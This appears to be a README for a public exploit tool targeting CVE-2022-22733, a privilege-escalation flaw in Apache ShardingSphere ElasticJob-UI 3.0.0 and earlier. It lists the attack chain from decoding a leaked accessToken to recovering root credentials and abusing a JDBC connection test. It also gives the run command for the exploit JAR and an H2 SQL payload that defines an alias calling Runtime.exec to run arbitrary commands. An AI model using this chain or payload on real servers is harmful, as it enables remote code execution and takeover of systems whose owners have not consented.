# CVE-2022-22733

CVE-2022-22733 is a vulnerabilit that affects Apache ShardingSphere ElasticJob-UI 3.0.0 and below versions, The vulnerability lead to Privilege Escalation. But, with abusing of the escalated privileges a `JDBC` Attack it can preformed & achieve RCE. You can read the vulnerability analysis from [Here]( & The exploit writing blog step by step from [Here](


The Exploit Works as the following:
- Login with the low-privileged account.
- Obtain the unsecure generated `accessToken`.
- Decode the unsecure generated `accessToken`.
- Parse the decoded data from the `accessToken`.
- Retrive `root` account credentials from the parsed data.
- Login with the `root` account credentials and obtain a full privileges on the application.
- Send a Connection Test request with abusing of the``JDBC` Attack.

# Usage
You can download `JAR` file from [here]( & Source code [here](

- Execute `jar`:
java -jar CVE-2022-22733.jar
- SQL script code:
CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws {Runtime.getRuntime().exec(cmd);return "123";}';CALL EXEC ('your_command_here')
# Demo